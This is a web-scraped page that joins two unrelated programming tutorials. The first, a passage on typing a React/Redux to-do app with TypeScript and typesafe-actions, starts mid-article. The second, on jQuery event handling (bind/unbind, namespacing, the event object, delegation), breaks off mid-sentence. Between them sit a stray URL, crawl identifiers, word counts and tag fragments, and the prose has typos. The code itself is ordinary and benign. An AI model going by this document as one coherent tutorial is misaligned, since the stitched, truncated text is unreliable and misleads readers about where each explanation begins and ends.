when the application first starts. Within the todoReducer function, we want type safety within the casestatements. Based on the earlier gist, we accomplished that by discriminated unions and type guarding, done by typing the action parameter. We have to first define an interface for every action object, and then create a union of them all and assign that to a type. This can get tedious if we have a lot of action creators — luckily, typesafe-actions has methods to help create the proper typing of the action creators without having to actually write out all the interfaces. declare module "MyTypes" { import { StateType, ActionType } from "typesafe-actions"; // 1 for reducer, 1 for action creators export type ReducerState = StateType<typeof import("../reducers").default>; export type RootAction = ActionType<typeof import("../actions/actions")>; } Ignoring line four for now and focusing on line five, we use a method called ActionType from the module, and import the actions from actions.ts to create the discriminated union types, which are then assigned to a type called RootAction. In line one of the todoReducers.ts, we import MyTypes and in line 14, we type the action parameter with MyTypes.RootAction. This allows us to have IntelliSense and autocompletion within the reducers! Now that we have the reducer set up, the ReducerState type from the types.d.ts file allows TypeScript to infer the shape of the state object in the reducer function. This will provide IntelliSense when we try to access the payload object within the Reducer. An example of what that looks like is in the picture below. IntelliSense in the Reducer Finally, let’s hook up the reducer to the redux store. import { createStore } from "redux"; import rootReducer from "../reducers"; const store = createStore(rootReducer); export default store; Let’s recap what we have accomplished up until this point. We have created and typed our action creators using the action method from typesafe-actions. We have created our types.d.ts file which provide type information on our action creators and reducer state. The reducer has been created and the actions are typed by using MyTypes.RootAction, which provide invaluable auto-completion information of the payload within the reducer’s case statements. And lastly, we created our Redux store. Let’s change gears and begin working on creating and typing our React components. I’ll go over examples of how to properly type both function and class based components, along with instructions on how to type both the props and state (for stateful components). import * as React from "react"; import TodoContainer from "./containers/TodoContainer"; export const App: React.FC<{}> = () => { return ( <> <h1>React Redux Typescript</h1> <TodoContainer /> </> ); }; App is a functional component that is typed by writing const App: React.FC<{}>. (FC refers to functional component.) If you aren’t familiar with generics (which is the <{}> ), I think of them like variables but for types. Since the shape of props and state can differ based on different use cases, generics are a way for us to, well, make the component generic! In this case, App doesn’t take any props; therefore, we pass in an empty object as the generic. How do we know that the generic is specifically for props? If you use VS code, IntelliSense will let you know what type it needs. Where it says <P = {}> , it means type {} has been assigned to P, where Pstands for props. For class-based components, React will use S to refer to state. App is a functional component that receives no props and is not connected to the Redux store. Let’s go for something a little more complicated. import * as React from "react"; import { connect } from "react-redux"; import { Dispatch } from "redux"; import * as MyTypes from "MyTypes"; import { actionTypes } from "../actions"; import { TodoItem } from "../components"; interface TodoContainerState { todoInput: string; } interface TodoContainerProps { count: number; todoList: string[]; addToDo: (item: string) => object; deleteToDo: (idx: number) => object; } class TodoContainer extends React.Component<TodoContainerProps, TodoContainerState> { constructor(props) { super(props); this.state = { todoInput: "" }; } handleTextChange = e => { this.setState({ todoInput: e.target.value }); }; handleButtonClick = () => { this.props.addToDo(this.state.todoInput); this.setState({ todoInput: "" }); }; handleDeleteButtonClick = (idx: number) => { console.log("deleting", idx); this.props.deleteToDo(idx); }; render() { let todoJSX: JSX.Element[] | JSX.Element; if (!this.props.todoList.length) { todoJSX = <p>No to do</p>; } else { todoJSX = this.props.todoList.map((item, idx) => { return ( <TodoItem item={item} key={idx} idx={idx} handleDelete={this.handleDeleteButtonClick} /> ); }); } return ( <div> {todoJSX} <input onChange={this.handleTextChange} placeholder={"New To Do Here"} value={this.state.todoInput} /> <button onClick={this.handleButtonClick}>Add To Do</button> </div> ); } } const MapStateToProps = (store: MyTypes.ReducerState) => { return { count: store.todo.count, todoList: store.todo.list }; }; const MapDispatchToProps = (dispatch: Dispatch<MyTypes.RootAction>) => ({ addToDo: (item: string) => dispatch({ type: actionTypes.ADD, payload: item }), deleteToDo: (idx: number) => dispatch({ type: actionTypes.DELETE, payload: idx }) }); export default connect( MapStateToProps, MapDispatchToProps )(TodoContainer); OK, TodoContainer.tsx is the most complicated of them all, but I’ll walk you through what’s going on in the code. TodoContainer is a React Class Component because I need it to hold in its state the value for the input box. It is also connected to the redux store, so it’ll have MapStateToProps and MapDispatchToProps . First, I’ve defined TodoContainerState . Since I’ll be holding the value of the input box in state, I’ll type the property as a string. Next, I’ve defined TodoContainerProps, which will be the shape of the Container’s props. Because class-based components can have both state and props, we should expect that there should be at least two generics that we need to pass into React.Component. P for Props and S for State If you mouse over React.Component, you can see that it takes in three generics, P, S, and SS. The first two generics are props and state. I’m not quite sure what SS is and what the use case is. If anyone knows, please let me know in the comments below. After passing in the generics into React.Component , IntelliSense and autocompletion will work within this.state and for props. Next, we want to type MapStateToProps and MapDispatchToProps. This is easily achievable by leveraging the MyTypes module that we built in the redux section. For MapStateToProps, we assign the store type to be MyTypes.ReducerState. An example of the IntelliSense it will provide is in the below screenshot. IntelliSense for MapStateToProps Lastly, we want to have type safety within MapDispatchToProps. The benefit that is provided is a type-safe payload given an action type. Type-safe payloads In the screenshot above, I purposely typed item as a boolean. Immediately, the TSServer will pick up that the boolean payload within MapDispatchToProps is not correct because it’s expecting the payload to be a string, given that the type is actionTypes.ADD. TodoContainer.tsx has the most going on since it is a class based React component, with both state and props, and is also connected to the store. Before we wrap up, let’s look at our last component: TodoItem.tsx This component is a functional component with props — code below. import * as React from "react"; interface TodoItemProps { item: string; idx: number; handleDelete: (idx: number) => void; } export const TodoItem: React.FC<TodoItemProps> = props => { return ( <span> {props.item} <button onClick={() => props.handleDelete(props.idx)}>X</button> </span> ); }; The shape of the props are defined in the interface TodoItemProps. The type information is passed into as a generic in React.FC. Doing so will provide auto-completion for props within the component. Awesome. Another great feature that TypeScript provides when used with React is IntelliSense for props when rendering React Components within JSX. As an example, if you delete idx:number from TodoItemProps and then you navigate to TodoContainer.tsx, an error will appear at the place where you render <TodoItem />. Property ‘idx’ does not exist Because we removed idx from the TodoItemProps interface, TypeScript is letting us know that we have provided an additional prop that it couldn’t find, idx, into the component. Lastly, let’s build the project using Webpack. In the command line, type npm run build. In the public folder within the root directory, you should see bundle.js alongside index.html. Open index.html in any browser and you should see a very simple, unstyled, to-do app. After webpack build I hope that I was able to demonstrate the power of TypeScript coupled with React and Redux. It may seem a bit overkill for our simple to-do list app — you just need to imagine the benefit of TS + React + Redux at scale. It will help new developers read the code quicker, provide more confidence in refactoring, and ultimately improve development speed. If you need more reference and material, I used the following two Git repos to teach myself Both these repos have proved invaluable for my learning, and I hope they will be the same for you. redux reactjs typescript javascript. In this React tutorial, you'll learn how to build a type-safe React Redux store with TypeScript. React is a component library developers commonly use to build the frontend of modern applications. Redux is a state management library that is popular in the React ecosystem Let's write a note taking application using ReactJS with Typescript and Redux. We'll use React-Redux hooks with Typescript here. Also I show how to use Redux... Using React with Redux and TypeScript .
https://morioh.com/p/d51255512a15
CC-MAIN-2020-29
refinedweb
3,031
58.69
To convert images to pdf file, you may use python img2pdf library, however, you may find Error: Refusing to work on images with alpha channel. To fix this error, you have to use Wand and ImageMagick to remove alpha channel. Fix Error: Refusing to work on images with alpha channel Using img2pdf – img2pdf Tutorial In this tutorial, we will introduce a new way to convert images to pdf without processing alpha channel. Preliminaries pip install PyMuPDF Import python libraries import sys, fitz Prepare a png image containing alpha channel imglist=['e:\\ts.png'] Convert this image to pdf doc = fitz.open() # PDF with the pictures for i, f in enumerate(imglist): img = fitz.open(f) # open pic as document rect = img[0].rect # pic dimension pdfbytes = img.convertToPDF() # make a PDF stream img.close() # no longer needed imgPDF = fitz.open("pdf", pdfbytes) # open stream as PDF page = doc.newPage(width = rect.width, # new page with ... height = rect.height) # pic dimension page.showPDFpage(rect, imgPDF, 0) # image fills the page doc.save("e:\\all-my-pics.pdf") In this example, we use a python list to save image path, which means we can convert some images to one pdf once. Pdf is iamge based pdf or text based? if you convert an image to pdf, it is image based. However, if you want to plan to conver an image to pdf with text based, you should extract text from image, then conver text to pdf, you can view more here:
https://www.tutorialexample.com/a-simple-guide-to-python-convert-image-to-pdf-without-removing-image-alpha-channel/
CC-MAIN-2021-31
refinedweb
249
67.35
Some people leave the lights at their workplaces on when they leave that is a waste of resources. As a hausmeister of DHBW, Sagheer waits till all students and professors leave the university building, then goes and turns all the lights off. The building consists of n floors with stairs at the left and the right sides. Each floor has m rooms on the same line with a corridor that connects the left and right stairs passing by all the rooms. In other words, the building can be represented as a rectangle with n rows and m + 2 columns, where the first and the last columns represent the stairs, and the m columns in the middle represent rooms. Sagheer is standing at the ground floor at the left stairs. He wants to turn all the lights off in such a way that he will not go upstairs until all lights in the floor he is standing at are off. Of course, Sagheer must visit a room to turn the light there off. It takes one minute for Sagheer to go to the next floor using stairs or to move from the current room/stairs to a neighboring room/stairs on the same floor. It takes no time for him to switch the light off in the room he is currently standing in. Help Sagheer find the minimum total time to turn off all the lights. Note that Sagheer does not have to go back to his starting position, and he does not have to visit rooms where the light is already switched off. The first line contains two integers n and m (1 ≤ n ≤ 15 and 1 ≤ m ≤ 100) — the number of floors and the number of rooms in each floor, respectively. The next n lines contains the building description. Each line contains a binary string of length m + 2 representing a floor (the left stairs, then m rooms, then the right stairs) where 0 indicates that the light is off and 1 indicates that the light is on. The floors are listed from top to bottom, so that the last line represents the ground floor. The first and last characters of each string represent the left and the right stairs, respectively, so they are always 0. Print a single integer — the minimum total time needed to turn off all the lights. 2 2 0010 0100 5 3 4 001000 000010 000010 12 4 3 01110 01110 01110 01110 18 In the first example, Sagheer will go to room 1 in the ground floor, then he will go to room 2 in the second floor using the left or right stairs. In the second example, he will go to the fourth room in the ground floor, use right stairs, go to the fourth room in the second floor, use right stairs again, then go to the second room in the last floor. In the third example, he will walk through the whole corridor alternating between the left and right stairs at each floor. 题意:有个人要关一个建筑所有的灯,输入一幅地图,从左下开始跑,1表示灯开的,0表示灯是关的,建筑有左右两边的楼梯。初始时在左楼梯, 这一层的灯没有关之前 不能上楼,走一个格子用1步,求关掉所有灯用的最少步数。 题解:DP,dp[i][j],i 表示 楼层数,j 表示 左右楼梯,dp[i][j] 表示 走到此楼梯所用的最少步数(把本层的灯关完后), 这题记得考虑 有可能一层楼中没有灯是亮的的情况。 当前楼梯可能是从 下一层左楼梯和右楼梯 上来 ,对他们取最小值来维护。 AC代码: #include <bits/stdc++.h> #define mem(a,b) memset(a,b,sizeof(a)) #define INF 0x3f3f3f3f using namespace std; int n, m, dp[20][2], l[20], r[20]; string mapp[20]; int main() { mem(dp, INF); mem(l, 0); mem(r, 0); cin >> n >> m; for (int i = n-1; i >= 0; i--) { cin >> mapp[i]; for (int j = 0; j < m+2; j++) { if (mapp[i][j] == '1') { l[i] = j; break; } } for (int j = m+1; j >= 0; j--) { if (mapp[i][j] == '1') { r[i] = j; break; } } } // // for (int i = 0; i < n; i++) { // cout << l[i] << " " << r[i] << endl; // } for (int i = n-1; i >= 0; i--) { //获取有亮灯的最上层 if (!l[i] && !r[i]) n--; else break; } if (n == 1) { cout << r[0] << endl; return 0; } dp[0][0] = 2 * r[0] + 1; dp[0][1] = m + 2; for (int i = 1; i < n - 1; i++) { if (!l[i] && !r[i]) { dp[i][0] = dp[i-1][0] + 1; dp[i][1] = dp[i-1][1] + 1; } else { dp[i][0] = min(dp[i-1][0] + 2 * r[i], dp[i-1][1] + m + 1) + 1; dp[i][1] = min(dp[i-1][0] + m + 1, dp[i-1][1] + 2 * (m+1 - l[i])) + 1; } } // cout << "--------" <<endl; // for (int i = 0; i < n-1; i++) { // for (int j = 0; j < 2; j++) { // printf("%d ", dp[i][j]); // } // cout << endl; // } // cout << "L[0]=" << l[0] << " R[0]=" << r[0] << endl; // cout << "R[n-1]=" << r[n-1] << " L[n-1]=" << l[n-1] << endl; cout << min(dp[n-2][0] + r[n-1], dp[n-2][1] + (m+1 - l[n-1])) << endl; return 0; }
https://blog.csdn.net/qq_40731186/article/details/79967532
CC-MAIN-2018-30
refinedweb
818
76.9
On Mon, 29 Nov 2004 14:15:48 PST, Greg KH wrote:> On Mon, Nov 29, 2004 at 10:48:24AM -0800, Gerrit Huizenga wrote:> > +#include <linux/module.h>> > +#include <linux/list.h>> > +#include <linux/fs.h>> > +#include <linux/namei.h>> > +#include <linux/namespace.h>> > +#include <linux/dcache.h>> > +#include <linux/seq_file.h>> > +#include <linux/pagemap.h>> > +#include <linux/highmem.h>> > +#include <linux/init.h>> > +#include <linux/string.h>> > +#include <linux/smp_lock.h>> > +#include <linux/backing-dev.h>> > +#include <linux/parser.h>> > +#include <asm/uaccess.h>> > +> > +#include <linux/rcfs.h>> > asm last please.Fixed.> > +/*> > + * Address of variable used as flag to indicate a magic file, > > + * value unimportant> > + */ > > +int RCFS_IS_MAGIC;> > Shouldn't this be static?Nope - used across files.> And what is a "magic" file used for? I see where you set something to> point to this, but no where do you check for it. What's the use of it?I believe that these are auto-created file entries which are instantiatedwhen a class is created, hence they "magically" appear. They are alsospecial in the sense that they are tied to the life of the class, unlikeother files in the class directories. The MAGIC value is used to helpdistinguish these auto-created entries from other entries in a directory.This is a little bit like "." and ".." but specific to the class creation.> > +int _rcfs_mknod(struct inode *dir, struct dentry *dentry, int mode, dev_t dev)> > +{> > + struct inode *inode;> > + int error = -EPERM;> > +> > + if (dentry->d_inode)> > + return -EEXIST;> > + inode = rcfs_get_inode(dir->i_sb, mode, dev);> > + if (inode) {> > + if (dir->i_mode & S_ISGID) {> > + inode->i_gid = dir->i_gid;> > + if (S_ISDIR(mode))> > + inode->i_mode |= S_ISGID;> > + }> > + d_instantiate(dentry, inode);> > + dget(dentry);> > + error = 0;> > + }> > + return error;> > +}> > +> > +EXPORT_SYMBOL_GPL(_rcfs_mknod);> > +> > +int rcfs_mknod(struct inode *dir, struct dentry *dentry, int mode, dev_t dev)> > +{> > + /* User can only create directories, not files */> > + if ((mode & S_IFMT) != S_IFDIR)> > + return -EINVAL;> > +> > + return dir->i_op->mkdir(dir, dentry, mode);> > +}> > +> > +EXPORT_SYMBOL_GPL(rcfs_mknod);> > Why 2 mknod functions? Do they both really need to be exported?I believe they are both exported so resource controllers can createclass specific directories (including corresponding magic files)in the case of _rcfs_mknod, and rcfs_mknod is the exported fs opwhich allows a restricted set of standard user filesystem operationswithin the created directory. So, yes.> > +> > +#define MAGIC_SHOW(FUNC) \> > +static int \> > You mix tabs and spaces in your #defines in this file, please just use> tabs properly.Fixed.> > +static ssize_t> > +target_reclassify_write(struct file *file, const char __user * buf,> > + size_t count, loff_t * ppos, int manual)> > +{> > + struct rcfs_inode_info *ri = RCFS_I(file->f_dentry->d_inode);> > + char *optbuf;> > + int rc = -EINVAL;> > + ckrm_classtype_t *clstype;> > +> > + if ((ssize_t) count < 0 || (ssize_t) count > TARGET_MAX_INPUT_SIZE)> > + return -EINVAL;> > But count is an unsigned variable, right? How could it ever be> negative?Yep. But see how those nice casts covered up all the warnings? ;-)(Fixed!)> > + if (!access_ok(VERIFY_READ, buf, count))> > + return -EFAULT;> > + down(&(ri->vfs_inode.i_sem));> > + optbuf = kmalloc(TARGET_MAX_INPUT_SIZE, GFP_KERNEL);> > kmalloc with a lock held? Is that a good idea?Lock? Or sema? Sema should be okay here, right?> You also don't check the return value of kmalloc, that's a bad idea.Yep - good catch. Fixed.> > + __copy_from_user(optbuf, buf, count);> > + if (optbuf[count - 1] == '\n')> > + optbuf[count - 1] = '\0';> > Stripping off a single trailing \n character? Why?I believe this is the "echo value > /rcfs/class/magic_file". Ifthere is a newline, it would show up as an extra newline duringan ls. Of course, Shailabh can correct me if I'm wrong on this one.> > +inline struct rcfs_inode_info *RCFS_I(struct inode *inode)> > +{> > + return container_of(inode, struct rcfs_inode_info, vfs_inode);> > +}> > +> > +EXPORT_SYMBOL_GPL(RCFS_I);> > This should be named something sane, and just use a #define for it like> most other container_of() users.Stupid name gone. I didn't grok the need for the #define though?> > +void rcfs_destroy_inodecache(void)> > +{> > + printk(KERN_WARNING "destroy inodecache was called\n");> > Do you really want to print this out in "production" code?Nope. Fixed.> > + if (kmem_cache_destroy(rcfs_inode_cachep))> > + printk(KERN_INFO> > + "rcfs_inode_cache: not all structures were freed\n");> > Shouldn't this really be INFO level? What is a user going to do with> this information?> > > +config RCFS_FS> > + tristate "Resource Class File System (User API)"> > + depends on CKRM> > + help> > + RCFS is the filesystem API for CKRM. This separate configuration > > + option is provided only for debugging and will eventually disappear > > + since rcfs will be automounted whenever CKRM is configured. > > +> > + Say N if unsure, Y if you've enabled CKRM, M to debug rcfs > > + initialization.> > +> > So is this option going to stay around, or should it always be enabled> if CKRM is enabled? Why not just do that for the user?It may be a module, but yes, this should be auto-set in the future whenCKRM is enabled.gerrit-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
http://lkml.org/lkml/2005/2/24/71
CC-MAIN-2014-52
refinedweb
793
51.24
Contents: Basic Drawing Colors Fonts Images Drawing Techniques If you've read the last few chapters and seen the examples in the tutorial in Chapter 2, A First Applet, then you've probably picked up the basics of how graphical operations are performed in Java. Up to this point, we have done some simple drawing and even displayed an image or two. In this chapter, we will finally give graphics programming its due and go into depth about drawing techniques and the tools for working with images in Java. In the next chapter, we'll explore image processing tools in more detail and we'll look at the classes that let you generate images pixel by pixel on the fly. The classes you'll use for drawing come from the java.awt package, as shown in Figure 13.1.[1]. . An instance of the java.awt.Graphics class is called a graphics context. It represents a drawable surface such as a component's display area or an off-screen image buffer. A graphics context provides methods for performing all basic drawing operations on its area, including the painting of image data. We call the Graphics object a graphics context because it also holds contextual information about the drawing area. This information includes parameters like the drawing area's clipping region, painting color, transfer mode, and text font. If you consider the drawing area to be a painter's canvas, you might think of a graphics context as an easel that holds a set of tools and marks off the work area. There are four ways you normally acquire a Graphics object. Roughly, from most common to least, they are: Each time a component's update() or paint() method is called, AWT provides the component with a new Graphics object for drawing in the display area. This means that attributes we set during one painting session, such as drawing color or clipping region, are reset the next time paint() or update() is called. (Each call to paint() starts with a tidy new easel.) For the most common attributes, like foreground color, background color, and font, we can set defaults in the component itself. Thereafter, the graphics contexts for painting in that component come with those properties initialized appropriately. If we are working in a component's update() method, we can assume our on-screen artwork is still intact, and we need only to make whatever changes are needed to bring the display up to date. One way to optimize drawing operations in this case is by setting a clipping region, as we'll see shortly. If our paint() method is called, however, we have to assume the worst and redraw the entire display. Methods of the Graphics class operate in a standard coordinate system. The origin of a newly created graphics context is the top left pixel of the component's drawing area, as shown in Figure 13.2. The diagram above illustrates the default coordinate system. The point (0,0) is at the top left corner of the drawing area; the point (width, height) is just outside the drawing area at the bottom right corner. The point at the bottom right corner within the drawing area has coordinates (width-1, height-1). This gives you a drawing area that is width pixels wide and height pixels high. The coordinate system can be translated (shifted) with the translate() method to specify a new point as the origin. The drawable area of the graphics context can be limited to a region with the setClip() method. The basic drawing and painting methods should seem familiar to you if you've done any graphics programming. The following applet, TestPattern, exercises most of the simple shape drawing commands; it's shown in Figure 13.3. import java.awt.*; import java.awt.event.*; public class TestPattern extends java.applet.Applet { int theta = 45; public void paint( Graphics g ) { int Width = size().width; int Height = size().height; int width = Width/2; int height = Height/2; int x = (Width - width)/2; int y = (Height- height)/2; int [] polyx = { 0, Width/2, Width, Width/2 }; int [] polyy = { Height/2, 0, Height/2, Height }; Polygon poly = new Polygon( polyx, polyy, 4 ); g.setColor( Color.black ); g.fillRect( 0, 0, size().width, size().height ); g.setColor( Color.yellow ); g.fillPolygon( poly ); g.setColor( Color.red ); g.fillRect( x, y, width, height ); g.setColor( Color.green ); g.fillOval( x, y, width, height ); g.setColor( Color.blue ); int delta = 90; g.fillArc( x, y, width, height, theta, delta ); g.setColor( Color.white ); g.drawLine( x, y, x+width, x+height ); } public void init() { addMouseListener( new MouseAdapter() { public void mousePressed( MouseEvent e ) { theta = (theta + 10) % 360; repaint(); } } ); } } TestPattern draws a number of simple shapes and responds to mouse clicks by rotating the filled arc and repainting. Compile it and give it a try. If you click repeatedly on the applet, you may notice that everything flashes when it repaints. TestPattern is not very intelligent about redrawing; we'll examine some better techniques in the upcoming section on drawing techniques. With the exception of fillArc() and fillPolygon(), each method takes a simple x, y coordinate for the top left corner of the shape and a width and height for its size. We have picked values that draw the shapes centered, at half the width and height of the applet. The most interesting shape we've have drawn is the Polygon, a yellow diamond. A Polygon object is specified by two arrays that contain the x and y coordinates of each vertex. In our example, the coordinates of the points in the polygon are (polyx[0], polyy[0]), (polyx[1], polyy[1]), and so on. There are simple drawing methods in the Graphics class that take two arrays and draw or fill the polygon, but we chose to create a Polygon object and draw it instead. The reason is that the Polygon object has some useful utility methods that we might want to use later. A Polygon can, for instance, give you its bounding box and tell you if a given point lies within its area. AWT also provides a Shape interface, which is implemented by different kinds of two dimensional objects. Currently, it is only implemented by the Rectangle and Polygon classes, but it may be a sign of things to come, particularly when JavaSoft releases the extended 2D drawing package. The setClip() method of the Graphics class takes a Shape as an argument, but for the time being, it only works if that Shape is a Rectangle. The fillArc() method requires six integer arguments. The first four specify the bounding box for an oval--just like the fillOval() method. The final two arguments specify what portion of the oval we want to draw, as a starting angle and an offset. Both the starting angle and the offset are specified in degrees. Zero degrees is at three o'clock; a positive angle is clockwise. For example, to draw the right half of a circle, you might call: g.fillArc(0, 0, radius * 2, radius * 2, -90, 180); See the Dial example in Chapter 11, Using and Creating GUI Components (widgets?) for an example of some trigonometric gymnastics with arcs(). Table 13.1 shows the shape-drawing methods of the Graphics class. As you can see, for each of the fill() methods in the example, there is a corresponding draw() method that renders the shape as an unfilled line drawing. draw3Drect() automatically chooses colors by "darkening" the current color. So you should set the color to something other than black, which is the default (maybe gray or white); if you don't, you'll just get black on both sides. For an example, see the PictureButton in Chapter 11, Using and Creating GUI Components. There are a few important drawing methods missing from Table 13.1. For example, the drawString() method, which draws text, and the drawImage() method, which draws an image. We'll discuss these methods in detail in later sections.
https://docstore.mik.ua/orelly/java/exp/ch13_01.htm
CC-MAIN-2021-39
refinedweb
1,336
62.48
Because of my involvement with the Design Guidelines effort I often get asked about “coding conventions” such as tab v. spaces, where to put the open brace, etc. My usual policy is not the chime in… these issues have a ton of religion around them and little value to external customers. But I, I was asked by one of my readers so thought I’d write a little about how the Framework organizes it’s source code and what works and what doesn’t. Essentially the idea is to have a root directory for each assembly MsCorLib, System.Dll, System.Web.Dll, etc. In those directories we have subdirectories for each namespace and each type gets its own cs file. So String would be in: \MSCorLib\System\String.cs And FileStream would be in: \MSCorLib\System\IO\FileStream.cs This is an organizational structure that helps a ton in terms of finding and separating source. You can see this yourself if you look at the Rotor source. As we got close to the end game for V1, we broke this pattern in the framework tree when we refactored types into several different assemblies, and merged some other assemblies into one (mostly for performance reasons). There are a few assemblies such as System.dll that now pull in code from ~6 different directories scattered throughout the tree. It takes a lot more effort (or memorization) to find types the source for types that live System.dll. Our dev team is not crazy about that as it increases the time to find the source for types…mostly they give up and type "dir /s". At least we generally keep to one class per file, so "dir /s" is usually successful.
http://blogs.msdn.com/b/brada/archive/2004/06/12/154406.aspx
CC-MAIN-2014-23
refinedweb
288
71.14
Facelets vs. JSF2 & EzComp Several things that make life painful with Facelets are fixed with JSF2 & EzComp. Take a look at some of the nicer things to come: Without all of this, with JSP or Facelets 1.2, you eventually need to write components in Java, which means a lot of time-consuming work. Having gone down that road, and then experienced EzComp, I’ve seen a time-saving of about 10x, with a lot more power to create really interactive and rich components through Ajax. Instead of 3-4 files required to make a component, you now have 1 — the component. Moral of the Story: If you are considering an upgrade from JSP, go right to JSF2 — it’s stable enough to begin development. Also, be sure to check out the developer blags for more updates on JSF2: - You can pass a value-binding into a component. - You can assign a listener to a specific input field/button inside a custom component. - You can pass facets into components and use them conditionally. - You can attach validators to specific input fields/buttons of components. - You can pass nested children into components and use them conditionally. - In EzComp, namespaces are created automatically by convention — no more taglibs - You can include CSS or JS files from packaged jars — a big issue when using shared libraries of components. - Standard support for Ajax — no javascript required (<f:ajax />). This is a great news, I hope JSF2.0 will come soon, and more important for application servers and web containers to be able to deploy its applications without extra configurations! Amr Gawish, Mojarra 2.0 Beta was just released. It should be extremely stable, certainly enough to begin development work on it. Mojarra 2 has been in the GlassFish v3 trunk for quite some time, and we have no major issues that I’m aware of. Furthermore, Mojarra 2 is available for GF v2, which, although it may not be your container, shows that it runs quite nicely in a a Java EE 5 environment, so Tomcat 6 (and perhaps 5), JBoss 5, etc should run Mojarra/JSF 2 very nicely. If you do run into issues, please file an issue on our tracker. Thanks, and have fun. 🙂 Jason Lee I can confirm that JSF2.0 applications do deploy/run on Tomcat 6.0.20 out of the box. HTH, Eric G.
https://www.ocpsoft.org/java/jsf-java/facelets-vs-jsf2-ezcomp/
CC-MAIN-2019-47
refinedweb
397
65.12
Not Limited To a Single ready() Event It is important to keep in mind that you can declare as many custom ready() events as you would like. You are not limited to attaching a single .ready() event to the document. The ready() events are executed in the order that they are included. Notes: Passing the jQuery function, a function - e.g. jQuery(funciton(){//code here}) - is a shortcut for jQuery(document).ready(). Attaching/Removing Events Using bind() and unbind() Using the bind() method - e.g. jQuery('a').bind('click',function(){}) - you can add any of the following standard handlers to the appropriate DOM elements. blur focus load resize scroll unload beforeunload click dblclick mousedown mouseup mousemove mouseover mouseout change submit keydown keypress keyup error Obviously, based on DOM standards, only certain handlers coincide with particular elements. In addition to this list of standard handlers, you can also leverage bind() to attach jQuery custom handlers - e.g. mouseenter and mouseleave - as well as any custom handlers you may create. To remove standard handlers or custom handlers, we simply pass the unbind() method the handler name or custom handler name that needs to be removed - e.g. jQuery('a').unbind('click'). If no parameters are passed to unbind(), it will remove all handlers attached to an element. These concepts just discussed are expressed in the code example below. <!DOCTYPE html> <html lang="en"> <body> <input type="text" value="click me"> <br> <br> <button>remove events</button> <div id="log" name="log"></div> <script src=""></script> <script> (function ($) { // Bind events $('input').bind('click', function () { alert('You clicked me!'); }); $('input').bind('focus', function () { // alert and focus events are a recipe for an endless list of dialogs // we will log instead $('#log').html('You focused this input!'); }); // Unbind events $('button').click(function () { // Using shortcut binding via click() $('input').unbind('click'); $('input').unbind('focus'); // Or, unbind all events // $('button').unbind(); }); })(jQuery); </script> </body> </html> Notes: jQuery provides several shortcuts to the bind() method for use with all standard DOM events, which excludes custom jQuery events like mouseenter and mouseleave. Using these shortcuts simply involves substituting the event's name as the method name - e.g. .click(), mouseout(), focus(). You can attach unlimited handlers to a single DOM element using jQuery. jQuery provides the one() event handling method to conveniently bind an event to DOM elements that will be executed once and then removed. The one() method is just a wrapper for bind() and unbind(). Programmatically Invoke a Specific Handler Via Short Event Methods The shortcut syntax - e.g. .click(), mouseout(), and focus() - for binding an event handler to a DOM element can also be used to invoke handlers programmatically. To do this, simply use the shortcut event method without passing it a function. In theory, this means that we can bind a handler to a DOM element and then immediately invoke that handler. Below, I demonstrate this via the click() event. <!DOCTYPE html> <html lang="en"> <body> <a>Say Hi</a> <!-- clicking this element will alert "hi" --> <a>Say Hi</a> <!-- clicking this element will alert "hi" --> <script src=""></script> <script> (function ($) { // Bind a click handler to all <a> and immediately invoke their handlers $('a').click(function () { alert('hi') }).click(); // Page will alert twice. On page load, a click // is triggered for each <a> in the wrapper set. })(jQuery); </script> </body> </html> Notes: It is also possible to use the event trigger() method to invoke specific handlers - e.g. jQuery('a').click(function(){ alert('hi') }).trigger('click'). This will also work with namespaced and custom events. jQuery Normalizes the Event Object jQuery normalizes the event object according to W3C standards. This means that when the event object is passed to a function handler you do not have to worry about browser-specific implementations of the event object (e.g. Internet Explorer's window.event). You can use the following attributes and methods of the event object worry-free from browser differences because jQuery normalizes the event object. Event Object Attributes event.type event.target event.data event.relatedTarget event.currentTarget event.pageX event.pageY event.result event.timeStamp Event Object Methods event.preventDefault() event.isDefaultPrevented() event.stopPropagation() event.isPropagationStopped() event.stopImmediatePropagation() event.isImmediatePropagationStopped() To access the normalized jQuery event object, simply pass the anonymous function, passed to a jQuery event method, a parameter named "event" (or whatever you want to call it). Then, inside of the anonymous callback function, use the parameter to access the event object. Below is a coded example of this concept. <!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { $(window).load(function (event) { alert(event.type); }); // Alerts "load" })(jQuery); </script> </body> </html> Grokking Event Namespacing Often we will have an object in the DOM that needs to have several functions tied to a single event handler. For example, let's take the resize handler. Using jQuery, we can add as many functions to the window.resize handler as we like. But what happens when we need to remove only one of these functions but not all of them? If we use $(window).unbind('resize'), all functions attached to the window.resize handler will be removed. By namespacing a handler (e.g. resize.unique), we can assign a unique hook to a specific function for removal. <!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { $(window).bind('resize', function () { alert('I have no namespace'); }); $(window).bind('resize.unique', function () { alert('I have a unique namespace'); }); // Removes only the resize.unique function from event handler $(window).unbind('resize.unique') })(jQuery); </script> </body> </html> In the above code, we add two functions to the resize handler. The second (document order) resize event added uses event namespacing and then immediately removes this event using unbind(). I did this to make the point that the first function attached is not removed. Namespacing events gives us the ability to label and remove unique functions assigned to the same handler on a single DOM element. In addition to unbinding a specific function associated with a single DOM element and handler, we can also use event namespacing to exclusively invoke (using trigger()) a specific handler and function attached to a DOM element. In the code below, two click events are being added to <a>, and then using namespacing, only one is invoked. <!DOCTYPE html> <html lang="en"> <body> <a>click</a> <script src=""></script> <script> (function ($) { $('a').bind('click', function () { alert('You clicked me') }); $('a').bind('click.unique', function () { alert('You Trigger click.unique') }); // Invoke the function passed to click.unique $('a').trigger('click.unique'); })(jQuery); </script> </body> </html> Notes: There is no limit to the depth or number of namespaces used - e.g. resize.layout.headerFooterContent. Namespacing is a great way of protecting, invoking, removing any exclusive handlers that a plugin may require. Namespacing works with custom events as well as standard events - e.g. click.unique or myclick.unique. Grokking Event Delegation Event delegation relies on event propagation (a.k.a. bubbling). When you click an <a> inside of a <li>, which is inside of a <ul>, the click event bubbles up the DOM from the <a> to the <li> to the <ul> and so on, until each ancestor element with a function assigned to an event handler fires. This means if we attach a click event to a <ul> and then click an <a> that is encapsulated inside of the <ul>, eventually the click handler attached to the <ul>, because of bubbling, will be invoked. When it is invoked, we can use the event object ( event.target) to identify which element in the DOM actually caused the event bubbling to begin. Again, this will give us a reference to the element 